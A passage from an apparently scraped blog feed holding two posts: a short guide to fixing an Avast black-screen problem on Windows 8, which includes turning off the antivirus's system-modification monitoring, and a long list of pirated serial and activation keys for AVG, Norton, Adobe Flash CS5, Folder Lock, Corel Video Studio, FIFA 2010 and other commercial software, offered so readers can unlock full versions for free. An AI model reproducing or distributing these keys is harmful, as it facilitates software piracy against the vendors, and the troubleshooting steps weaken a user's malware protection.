&lt;div class=&quot;post-footer&quot; style=&quot;-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 1.6; margin: 1.5em 0px 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;&quot;&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;post-body entry-content&quot; id=&quot;post-body-5504739931013714281&quot; itemprop=&quot;articleBody&quot; style=&quot;-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: 18px; orphans: auto; position: relative; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; width: 866px; word-spacing: 0px;&quot;&gt;
&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
--Open &lt;b&gt;Avast&lt;/b&gt;-&lt;br /&gt;go to&amp;nbsp; security &amp;gt;Behavior Shield &amp;gt; Settings. and click on&amp;nbsp; Trusted Processes&lt;br /&gt;&lt;br /&gt;Add the following 2&amp;nbsp; files by browsing them to this paths&lt;br /&gt;” C:\Windows\explorer.exe ” and&lt;br /&gt;” C:\Windows\ImmersiveControlPanel\SystemSettings.exe “&lt;br /&gt;&lt;br /&gt;&amp;nbsp;IF you have difficulties in browsing those two files then you can copy them and directly past them into the fields.&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; C:\Windows\explorer.exe&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; C:\Windows\ImmersiveControlPanel\SystemSettings.exe&lt;br /&gt;&lt;br /&gt;avast black screen problem in &lt;b&gt;Windows 8&lt;/b&gt;-&lt;br /&gt;&lt;br /&gt;this technique should have solved your black screen problem ….. :) :)&lt;br /&gt;&lt;br /&gt;&amp;nbsp;If the information on our website has helped you then pay us with a like in Facebook :)&amp;nbsp; .&lt;br /&gt;&lt;br /&gt;If the above feedback does not work for your computer.You can even follow below procedure and solve your problem with windows 8.&lt;br /&gt;Alternative way !&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Start your computer and log in to your &lt;b&gt;windows 8 OS&lt;/b&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; After you login with your password or a direct login with out password as usually you will get a black screen if you have an installed&amp;nbsp;&lt;/div&gt;
&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;b&gt;avast anti-virus&lt;/b&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; press &lt;b&gt;ctrl+alt+del&lt;/b&gt; and choose task manager , you can also do it by pressing&amp;nbsp; ctrl+shift+Esc .&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Go to startup tab in Task manager and right-click your avast! Antivirus there and choose&amp;nbsp; Open file location.&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; A window will open , click on AvastUI&amp;nbsp; which will take you to avast user interface .&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Now go to security &amp;gt;Behavior Shield &amp;gt; Settings.&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Uncheck the&amp;nbsp; ” Monitor the system for unauthorized modifications&amp;nbsp; ” box .&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; You are done now press ctrl+alt+del and sign out and login again. You are with your &lt;b&gt;windows 8&lt;/b&gt; desktop and your windows 8&amp;nbsp;&lt;/div&gt;
&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
black screen problem is gone. If you feel this knowledge helped you, you can comment and subscribe for forzeal to get more updates.&lt;br /&gt;&lt;br /&gt;If your problem is sill not yet solved after trying the above 2 procedures then you&amp;nbsp; can comment your experience . I am glad to tell you&amp;nbsp;&lt;/div&gt;
&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
if there is an alternative to your problem . Mostly your problem will be solved if you correctly follow the above procedures.&amp;nbsp;&lt;/div&gt;
&lt;div style=&quot;clear: both; font-weight: normal;&quot;&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://gouravinfo.blogspot.com/feeds/2482679876424048153/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://gouravinfo.blogspot.com/2013/09/solution-for-avast-black-screen-problem.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/2482679876424048153'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/2482679876424048153'/><link rel='alternate' type='text/html' href='http://gouravinfo.blogspot.com/2013/09/solution-for-avast-black-screen-problem.html' title='Solution For Avast Black Screen Problem In Windows 8'/><author><name>Gourav Ratnawat</name><uri>http://www.blogger.com/profile/03815155318390279322</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIZoLmC65AXKrNABnNfxhzeowPYCsr93DX9SQDkIH_2SEiHQddadPoboFvNG0_zEDxj6lGmengwWk33scEp3cO0HegFS-kxERyTDTOrM2tMtgbhtE_4_a7jORklx4yVGs/s220/FB_IMG_1557336607561.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-276484908558385294.post-2962856054506748830</id><published>2013-08-14T23:58:00.000+05:30</published><updated>2013-08-31T10:49:32.407+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Android"/><category scheme="http://www.blogger.com/atom/ns#" term="Applications"/><category scheme="http://www.blogger.com/atom/ns#" term="Computer"/><category scheme="http://www.blogger.com/atom/ns#" term="Iphone"/><category scheme="http://www.blogger.com/atom/ns#" term="Mobile"/><category scheme="http://www.blogger.com/atom/ns#" term="Windows"/><title type='text'>Serial Keys Of Most Wanted Software&#39;s</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 7px 0px;&quot;&gt;
Guyz, fed up with the message that your Trial Version&amp;nbsp;is gonna over kindly Upgrade it. So we have a free solution for you.&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 7px 0px;&quot;&gt;
Below are some&amp;nbsp;&lt;b&gt;Registration Keys&lt;/b&gt;&amp;nbsp;which you can use to activate the &lt;b&gt;Full Version&amp;nbsp;&lt;/b&gt;of software&#39;s for free.&lt;/div&gt;
&lt;div style=&quot;background-color: white; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 7px 0px;&quot;&gt;
&lt;span style=&quot;color: #555555;&quot;&gt;Run the application&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: #555555;&quot;&gt;and open the tab where it is asking for keys and just put any &lt;b&gt;Key&lt;/b&gt; and hit enter.&lt;/span&gt;&lt;/div&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/07/how-to-get-unlimited-coins-and-gems-in.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;Make Unlimited Free Calls&quot;&gt;&lt;strong&gt;Avg antivirus 2013 Serial&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;8meh-r9q3v-zhe2t-92kcr-a9gls-yembr-aced&lt;/li&gt;
&lt;li&gt;8meh-rlkzo-8chhh-hsyka-kauxg-sembr-aced&lt;/li&gt;
&lt;li&gt;8meh-r6633-ypt9h-ycnsr-h42ot-eembr-aced&lt;/li&gt;
&lt;li&gt;8meh-r2cml-sswfw-moxfr-tcrgu-3embr-aced&lt;/li&gt;
&lt;li&gt;8meh-rfod4-sx7r8-jrtqa-jgero-wembr-aced&lt;/li&gt;
&lt;li&gt;8meh-rnzll-2yuqx-79ppa-m3tde-aembr-aced&lt;/li&gt;
&lt;li&gt;8meh-rk82s-pwf92-c33ba-qdw4h-gembr-aced&lt;/li&gt;
&lt;li&gt;8meh-rf22z-an7hs-qdwmr-2eebp-bembr-aced&lt;/li&gt;
&lt;li&gt;8meh-ryh2w-sak7n-h2hga-w73j4-9embr-aced&lt;/li&gt;
&lt;li&gt;8meh-rnxbd-gmngf-bslsr-zjkod-pembr-aced&lt;/li&gt;
&lt;li&gt;8meh-rf4bz-fh4uo-vrv3a-4ch9l-dembr-aced&lt;/li&gt;
&lt;li&gt;8meh-rg9b7-bggvc-pxrcr-jpr2l-hembr-aced&lt;/li&gt;
&lt;li&gt;8meh-rvega-vjyy3-y3dla-8nxy2-6embr-aced&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/07/how-to-get-unlimited-coins-and-gems-in.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;Web Designer/Hosting&quot;&gt;&lt;strong&gt;Adobe Flash Professional CS5&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;1302-1194-4375-5059-8090-0288&lt;/li&gt;
&lt;li&gt;1302-1956-2248-1616-0365-7124&lt;/li&gt;
&lt;li&gt;1302-1645-5592-7683-5740-9343&lt;/li&gt;
&lt;li&gt;1302-1065-1908-3692-6001-0784&lt;/li&gt;
&lt;li&gt;1302-1086-3696-5544-5238-9400&lt;/li&gt;
&lt;li&gt;1302-1339-8680-7615-5184-8324&lt;/li&gt;
&lt;li&gt;1302-1065-1908-3692-6001-0784&lt;/li&gt;
&lt;li&gt;1302-1059-9625-8530-7802-6962&lt;/li&gt;
&lt;li&gt;1302-1339-8680-7615-5184-8324&lt;/li&gt;
&lt;li&gt;1302-1116-8780-8984-8675-8256&lt;/li&gt;
&lt;li&gt;1302-1912-4694-1510-2945-5932&lt;/li&gt;
&lt;li&gt;1302-1059-9625-8530-7802-6962&lt;/li&gt;
&lt;li&gt;1302-1194-4375-5059-8090-0288&lt;/li&gt;
&lt;li&gt;1302-1339-8680-7615-5184-8324&lt;/li&gt;
&lt;li&gt;1302-1956-2248-1616-0365-7124&lt;/li&gt;
&lt;li&gt;1302-1912-4694-1510-2945-5932&lt;/li&gt;
&lt;li&gt;1302-1116-8780-8984-8675-8256&lt;/li&gt;
&lt;li&gt;1302-1956-2248-1616-0365-7124&lt;/li&gt;
&lt;li&gt;1302-1912-4694-1510-2945-5932&lt;/li&gt;
&lt;li&gt;1302-1065-1908-3692-6001-0784&lt;/li&gt;
&lt;li&gt;1302-1835-3972-5775-4732-9757&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/07/how-to-get-unlimited-coins-and-gems-in.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;Top 5 Useful Mozilla Firefox Addons&quot;&gt;&lt;strong&gt;Folder Lock 7.1.1 Final&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;&lt;span style=&quot;color: #555555;&quot;&gt;&lt;b&gt;Serial Key&lt;/b&gt;: F7-20120725-2-873991&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;color: #555555;&quot;&gt;&lt;b&gt;Registration&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;color: #555555;&quot;&gt;: 58260C22969C0EE8C65E3CB20460E4F44A063486&lt;/span&gt;&lt;/li&gt;
&lt;li style=&quot;color: #555555;&quot;&gt;serial key: F7-20120725-3-968359&lt;/li&gt;
&lt;li style=&quot;color: #555555;&quot;&gt;registration: 4E3A626E0EE4E0CEDE30EE22509858386C7A7CEA&lt;/li&gt;
&lt;li style=&quot;color: #555555;&quot;&gt;serial key: F7-20120725-8-354379&lt;/li&gt;
&lt;li style=&quot;color: #555555;&quot;&gt;registration&amp;nbsp;:76F60EB08CE6186A88C2E4AE646EAEA8147E4052&lt;/li&gt;
&lt;li style=&quot;color: #555555;&quot;&gt;serial key: F7-20120725-3-339758&lt;/li&gt;
&lt;li style=&quot;color: #555555;&quot;&gt;registration&amp;nbsp;:C6E26644AA4AA606CC00B46206B2FC129EB256B0&lt;/li&gt;
&lt;li style=&quot;color: #555555;&quot;&gt;serial key: F7-20120725-1-691441&lt;/li&gt;
&lt;li style=&quot;color: #555555;&quot;&gt;registration&amp;nbsp;:5AB890E642D6400C1678D0640E9E88CA26FA88C4&lt;/li&gt;
&lt;li style=&quot;color: #555555;&quot;&gt;serial key: F7-20120725-3-663346&lt;/li&gt;
&lt;li style=&quot;color: #555555;&quot;&gt;registration&amp;nbsp;: F7AC2E8BAC028EAA26042C018B8B4A6B8F46A1AAA&lt;/li&gt;
&lt;li style=&quot;color: #555555;&quot;&gt;serial key: F7-20120725-9-295215&lt;/li&gt;
&lt;li style=&quot;color: #555555;&quot;&gt;registration&amp;nbsp;:B6EA60745C24DE70769A1EC4FCD62C5CD8E8FC6A&lt;/li&gt;
&lt;li style=&quot;color: #555555;&quot;&gt;serial key: F7-20120725-4-188913&lt;/li&gt;
&lt;li style=&quot;color: #555555;&quot;&gt;registration&amp;nbsp;:9CAEC42C5E74CE10065A20D85410601EC4007CFA&lt;/li&gt;
&lt;li style=&quot;color: #555555;&quot;&gt;serial key: F7-20120725-6-219585&lt;/li&gt;
&lt;li style=&quot;color: #555555;&quot;&gt;registration&amp;nbsp;:F7-A98B6FC12A60E621E462AAE4EAE70AED4126002&lt;/li&gt;
&lt;li style=&quot;color: #555555;&quot;&gt;serial key: F7-20120725-1-869828&lt;/li&gt;
&lt;li style=&quot;color: #555555;&quot;&gt;registration&amp;nbsp;:F7242FA5E14AE88C89EACF6964068121A2264BCC2&lt;/li&gt;
&lt;li style=&quot;color: #555555;&quot;&gt;serial key: F7-20120725-4-863538&lt;/li&gt;
&lt;li style=&quot;color: #555555;&quot;&gt;registration&amp;nbsp;&lt;img alt=&quot;:D&quot; class=&quot;wp-smiley&quot; src=&quot;http://techdial.in/wp-includes/images/smilies/icon_biggrin.gif&quot; style=&quot;background-color: #f9f9f9; background-position: initial initial; background-repeat: initial initial; border: none; height: auto; max-width: 98%; text-align: center; vertical-align: bottom; width: auto;&quot; /&gt;&amp;nbsp;090E2729622027884288C1E1E46DCC81CD4FE30&lt;/li&gt;
&lt;li style=&quot;color: #555555;&quot;&gt;serial key: F7-20120725-8-475696&lt;/li&gt;
&lt;li style=&quot;color: #555555;&quot;&gt;registration&amp;nbsp;:42C85E9E8620E404F25412C4EA6852944EA4CA88&lt;/li&gt;
&lt;li style=&quot;color: #555555;&quot;&gt;serial key: F7-20120725-9-222467&lt;/li&gt;
&lt;li style=&quot;color: #555555;&quot;&gt;registration&amp;nbsp;:7E52F24C3254C40A3802A6924E44B0A21A3060C0&lt;/li&gt;
&lt;li style=&quot;color: #555555;&quot;&gt;serial key: F7-20120725-4-436627&lt;/li&gt;
&lt;li style=&quot;color: #555555;&quot;&gt;registration&amp;nbsp;:7A52720C8E12A0A80CF8FE9ABA1094089C6EB034&lt;/li&gt;
&lt;li style=&quot;color: #555555;&quot;&gt;serial key: F7-20120725-5-224353&lt;/li&gt;
&lt;li style=&quot;color: #555555;&quot;&gt;registration&amp;nbsp;:7CEA8028A8F808569AB0AAFECC98B2E896302882&lt;/li&gt;
&lt;li style=&quot;color: #555555;&quot;&gt;serial key: F7-20120725-7-112789&lt;/li&gt;
&lt;li style=&quot;color: #555555;&quot;&gt;registration&amp;nbsp;:784C1ABE7AAAC8E80680F8BAF00292DE4CDCC4DE&lt;/li&gt;
&lt;li style=&quot;color: #555555;&quot;&gt;serial key: F7-20120725-6-137291&lt;/li&gt;
&lt;li style=&quot;color: #555555;&quot;&gt;registration&amp;nbsp;:F6FA767AE2DEBCCA1AF64A4E0C88B82844781E94&lt;/li&gt;
&lt;li style=&quot;color: #555555;&quot;&gt;serial key: F7-20120725-1-619748&lt;/li&gt;
&lt;li style=&quot;color: #555555;&quot;&gt;registration&amp;nbsp;:82C820C8825CF4B4D8F8BA46D42EA4A2CAC41A8&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/07/how-to-get-unlimited-coins-and-gems-in.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;How to Crack Windows Administrator Password – Without Loosing Any Data&quot;&gt;&lt;strong&gt;Norton Internet Security 2012&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;Serial: JT888GWHQ7RQ32B932BB89XJM&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;strong&gt;&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/07/how-to-get-unlimited-coins-and-gems-in.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;How To Open Adf.ly Links In India And Other Countries Where Its Blocked&quot;&gt;Super AntiSpyware Professional v5.6.1014&lt;/a&gt;&lt;/strong&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;Serial Number: 322-412-2500&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Activation Code&lt;/b&gt;: 60c2-7e0c-10ad-329d&lt;/li&gt;
&lt;li&gt;Serial Number: 395-790-9638&lt;/li&gt;
&lt;li&gt;Activation Code: b8b9-f84b-0e4d-dd7d&lt;/li&gt;
&lt;li&gt;Serial Number: 109-577-0923&lt;/li&gt;
&lt;li&gt;Activation Code: ca2c-0423-1199-78f0&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/07/watch-youtube-18-video-without-singing.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;Compress File Size From 1gb to 10mb&quot;&gt;&lt;strong&gt;USB Drive Antivirus V.3.02 Build 0509&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;&amp;nbsp;NAME-USB Antivirus&lt;/li&gt;
&lt;li&gt;Serial-WWHKZY&lt;/li&gt;
&lt;/ul&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;NAME-User&lt;/li&gt;
&lt;li&gt;Serial-WWKZ&lt;/li&gt;
&lt;/ul&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;&amp;nbsp;NAME-Rock_OM&lt;/li&gt;
&lt;li&gt;Serial-TSIS&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 7px 0px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;NAME-Frendz&lt;/li&gt;
&lt;li&gt;Serial-HVKVN&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/07/watch-youtube-18-video-without-singing.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;Trick to watch youtube videos without buffering even on very slow network connection&quot;&gt;&lt;strong&gt;Corel Video Studio 12 Serials&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;VS14R22-PR6QWBP-GUCYVNG-UKSQJHA&lt;/li&gt;
&lt;/ul&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;VS14R22-T5525UA-V4EG9DR-P6TB6UE&lt;/li&gt;
&lt;/ul&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;VS14R22-UYC4CTQ-BPQJT25-WTT4SPS&lt;/li&gt;
&lt;li&gt;VS14R22-9LHHX33-ZP4N5P4-SBM7HGS&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 7px 0px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;VS14R22-D8YUMAB-A2Q3YNE-HMQWNWE&lt;/li&gt;
&lt;li&gt;VS14R22-R5BNPCQ-DKY26BT-DPY6C9J&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 7px 0px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;VS14R22-QKDXPFN-YRVKL2E-HGZRG6E&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/07/watch-youtube-18-video-without-singing.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;Donations&quot;&gt;&lt;strong&gt;AVG Antivirus Professional 2012 Serial Number&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;8MEH-RW2ZU-29S4F-26QCR-WFZV4-BEMBR-ACED&lt;/li&gt;
&lt;li&gt;8MEH-RREY3-L2LQA-LUMOR-UHNK2-6EMBR-ACED&lt;/li&gt;
&lt;li&gt;8MEH-RPDWL-THRLY-O8Z3R-474SC-4EMBR-ACED&lt;/li&gt;
&lt;li&gt;8MEH-RPTGT-KMOL7-EEEVR-KORKD-LEMBR-ACED&lt;/li&gt;
&lt;li&gt;8MEH-RMXLW-HN44A-BABPA-SBK3B-PEMBR-ACED&lt;/li&gt;
&lt;li&gt;8MEH-RCKOP-BP9KK-YW8EA-6K8TK-SEMBR-ACED&lt;/li&gt;
&lt;li&gt;8MEH-RXYFD-JUV72-8922R-FTBZ6-QEMBR-ACED&lt;/li&gt;
&lt;li&gt;8MEH-RAJC2-O3P77-KRRQA-H3SLN-REMBR-ACED&lt;/li&gt;
&lt;li&gt;8MEH-R2CML-SS7FW-MOXFR-TRU8V-3EMBR-ACED&lt;/li&gt;
&lt;li&gt;8MEH-RS47Y-82HT8-GONVA-BCCCZ-DEMBR-ACED&lt;/li&gt;
&lt;li&gt;8MEH-RXYFD-JUV72-8922R-FTDO8-QEMBR-ACED&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/07/watch-youtube-18-video-without-singing.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;Best smartphones below 5000rs.&quot;&gt;&lt;strong&gt;FIFA 2010&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;URU4-HVRD-G8H7-F7G4-1911&lt;/li&gt;
&lt;li&gt;KKHH-FRTB-L1M2-F5V8-1911&lt;/li&gt;
&lt;li&gt;URKK-F9Y4-G5U8-33Q1-1911&lt;/li&gt;
&lt;li&gt;PMXP-49L2-D1G2-85L0-1911&lt;/li&gt;
&lt;li&gt;J87P-39P7-W8J4-T3F7-1911&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/07/watch-youtube-18-video-without-singing.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;Bestest Ways To Make Money Online Fast&quot;&gt;&lt;strong&gt;Angry Birds Space&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;THET-ALEV-LEFR-USWO OR 00a00b00c00d&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/07/watch-youtube-18-video-without-singing.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;Google – Working on a Videogame Console&quot;&gt;&lt;strong&gt;PC Optimizer Pro&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;XUV4-9MP-6AFC-NN8-7NP|XUV4-9MP-6AFC-NN8-7NR&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/07/watch-youtube-18-video-without-singing.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;Facebook And Google hoist Rainbow Flag in support of “Gay Rights”&quot;&gt;&lt;strong&gt;Defrag Professional Edition 4.0.508&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;Name: Hans Mueller&lt;br /&gt;License: DPM1-0VNZ-002Q-X32X-033Y&lt;/li&gt;
&lt;/ul&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;Name: Hans Mueller&lt;/li&gt;
&lt;li&gt;License: DPM1-0VNZ-002Q-X32X-033Y&lt;/li&gt;
&lt;/ul&gt;
